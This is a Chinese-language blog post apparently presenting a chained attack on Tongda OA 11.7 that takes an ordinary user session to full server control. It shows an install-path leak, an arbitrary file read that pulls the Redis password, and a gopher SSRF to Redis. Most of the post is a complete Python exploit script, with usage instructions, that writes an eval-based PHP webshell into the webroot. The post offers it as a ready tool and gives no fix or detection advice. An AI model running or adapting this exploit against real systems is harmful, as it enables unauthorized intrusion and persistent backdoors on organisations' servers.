通达OA 后台getshell 新思路

作者: print("") 分类: 未分类 发布时间: 2020-08-17 15:28

之前碰到一个是后台sql 没办法写入文件。然后对于普通用户的情况下。如何getshell  这里通过三个小漏洞的结合导致的一个getshell

这里使用的是通达OA 11.7  最新版。下载地址如下:https://www.tongda2000.com/download/p2019.php?F=baidu_natural&K=

1.获取安装目录

/general/approve_center/archive/getTableStruc.php

首先是任意文件读取

 
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2

读取到redis 密码。然后通过ssrf




/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/

最后面写了一个python



# -*- coding:utf-8 -*-
import os
import requests
import re
# author :print("")
import urllib
class GenerateUrl:
    def __init__(self, password, webroot, filename):
        self.password = password
        self.webroot = webroot
        self.filename = filename
        self.webshell = '''
        
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>


'''
        self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
{filename}
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit

'''
    def __str__(self):
        webshell = self.webshell
        webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
        webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<','%3c').replace('?', '%3f').replace('>', '%3e')
        self.template = self.template.replace("{password_len}", str(len(self.password)))
        self.template = self.template.replace("{password}", self.password)
        self.template = self.template.replace("{filename_len}", str(len(self.filename)))
        self.template = self.template.replace("{filename}", self.filename)
        self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
        self.template = self.template.replace("{webroot}", self.webroot)
        self.template = self.template.replace("{content_len}", str(len(self.webshell)))
        self.template = self.template.replace("{content}", webshell)
        self.template = self.template.replace('\n', '%0D%0A')

        return urllib.quote_plus(self.template)



proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}
def headers(phpsesion):
    return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
               "Cookie":phpsesion
    }

#获取绝对目录
def get_path(url,headers):
    urlc=url
    url=(url+'/general/approve_center/archive/getTableStruc.php')
    try:
        data=requests.get(url=url,headers=headers,proxies=proxies).json()
        path=data['logPath'].split('\\')[0]
        url2=urlc+'/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2'%path
        data2 = requests.get(url=url2, headers=headers, proxies=proxies)
        ress=re.search('requirepass .+',data2.text).group()
        return {"path":path,"redis_pass":ress.replace('requirepass ','').strip()}
    except:
        exit('ERROR Cookie PHPSESSID expired')

#ssrf写入文件
def ssrf_webshell(url,path,password):
    urlc=url
    path=path
    password=password
    a = GenerateUrl(password, path+"/webroot/", "666.php")
    url=url+'/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s'%('gopher://127.0.0.1:6399/' + str(a))
    data = requests.get(url=url, headers=headers, proxies=proxies)
    ddd=requests.get(url=urlc+'/666.php')
    if ddd.status_code==200:
        print('shell url:%s'%urlc+'/666.php')
    else:
        print('send shell ERROR')
    return True

if __name__ == '__main__':
    import sys
    try:
        url=sys.argv[1]
        cookie=sys.argv[2]
        headers=headers(cookie)
        root_path=get_path(url,headers)
        ssrf_webshell(url,root_path['path'],root_path['redis_pass'])
    except:
        print('python tongda.py http://127.0.0.1 PHPSESSID=9n6bc6pfcmj9ju4r3j7o0c6gg7')

执行方式
 
python tongda.py http://127.0.0.1 PHPSESSID=9n6bc6pfcmj9ju4r3j7o0c6gg7

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注